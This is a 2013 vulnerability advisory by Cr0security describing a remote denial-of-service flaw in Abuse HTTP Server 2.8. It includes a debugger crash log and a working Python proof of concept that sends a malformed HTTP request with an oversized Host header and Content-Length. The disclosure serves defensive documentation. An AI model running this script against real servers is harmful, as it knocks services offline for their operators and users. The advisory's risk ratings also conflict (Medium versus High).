Abuse HTTP Server 2.8 Remote Denial Of Service

2013.10.03
Credit: Cr0security
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-404

Advisory Information : ====================== Title : Abuse HTTP Server 2.8 - Remote Denial Of Service Advisory ID : Cr02013-002 Product : HTTP Server Vendor : SmartUX Vulnerable Version(s) : 2.8 and probably prior release Tested Version : 2.8 Tested On : Windows XP, Windows 7 Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404] Risk Level : High CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H) Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com Introduction : ============== Abuse HTTP Server is a small program designed to become a WebServer. - Based on / Copied from : http://abuse-httpd.sourceforge.net/ Advisory Details: ================= Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server. Proof Of Concept : ================== The Attacker run this remote exploit DOS code targeted to remote server host, and the connection between server and android client will be disconected or terminated. With debugging (Log-using ollydbg) : Log data, item 3 Address=7C8106E9 (crash address) Message=New thread with ID 000006D0 created Log data, item 2 Message=Thread 000006D0 terminated, exit code 0 Log data, item 1 Message=Thread 00000794 terminated, exit code CB (203.) Log data, item 0 Message=Process terminated, exit code CB (203.) Register FPU log : EAX 00000000 ECX 7C800000 kernel32.7C800000 EDX 7C97B120 ntdll.7C97B120 EBX 00000000 ESP 0012EDD4 EBP 0012EED0 ESI 7C90DE50 ntdll.ZwTerminateProcess EDI 000000CB EIP 7C90E4F4 ntdll.KiFastSystemCallRet C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_CLASS_HAS_WINDOWS (00000584) EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -??? FFFF 00FF00FF 00FF00FF ST1 empty -??? FFFF 00FF00FF 00FF00FF ST2 empty -??? FFFF 00FE00B2 006E007A ST3 empty -??? FFFF 00FE00B2 006B0077 ST4 empty -NAN FFFF FFB36B77 FFB36E7A ST5 empty -??? FFFF 00FF00B3 006B0077 ST6 empty -??? FFFF 00000000 00000000 ST7 empty -??? FFFF 00800080 00800080 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0 SEH chain of main thread: Address SE handler 0012FC50 kernel32.7C839AC0 0012FCA8 Abuse.0040D7E3 0012FD78 USER32.7E44048F 0012FDD8 USER32.7E44048F 0012FEF0 USER32.7E44048F 0012FF50 USER32.7E44048F 0012FFE0 kernel32.7C839AC0 Sample dummy tool for disconected only ====================================== --- Python Remote DOS code --- #!/usr/bin/python import socket import os import sys crash = "0" * 504 buffer="GET / HTTP/1.1\r\n" buffer+="Host: " + crash + "\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n" buffer+="Content-Length : 1048580\r\n\r\n" print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com" print "[*] Change some option in code with your self" print "[*] Connect to host and send payload" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.101", 80)) expl.send(buffer) print "[*] Server Disconected" expl.close() ------------- EOF ------------- Report-Timeline : ================= 29/09/2013 : Vendor Contacted / No response. 30/09/2013 : Public Disclosure. Remediation : ============= There isn't remediation step from the Vendor until this Public Disclosure. References : ============ - Common Weakness Enumeration (CWE) - http://cwe.mitre.org - Share KM - http://abuse-httpd.sourceforge.net/ About Cr0security : =================== Cr0security is a company that moved on "Information and Technologies" especially on Computer Security System, Network Security, and Secure Computer Application Development. with a reference to the publics needs of using the information system technology with better security, Cr0security ready to help you to reach secure point and creating a comfortable moment while you are perform any activities through your networks or computers at once. In computer software development we also implement the "Secure Programming". so security of the applications, the data, and the computer will be strictly maintained. Beside we can act as your Consultant, We can act as your partner to achieve the best solution. Contact Cr0security : ===================== Email : info[at]cr0security.com Website : http://www.cr0security.com Disclaimer : ============ The information provided in this advisory is provided "as is" without warranty of any kind. Cr0security disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Cr0security or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Cr0security or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top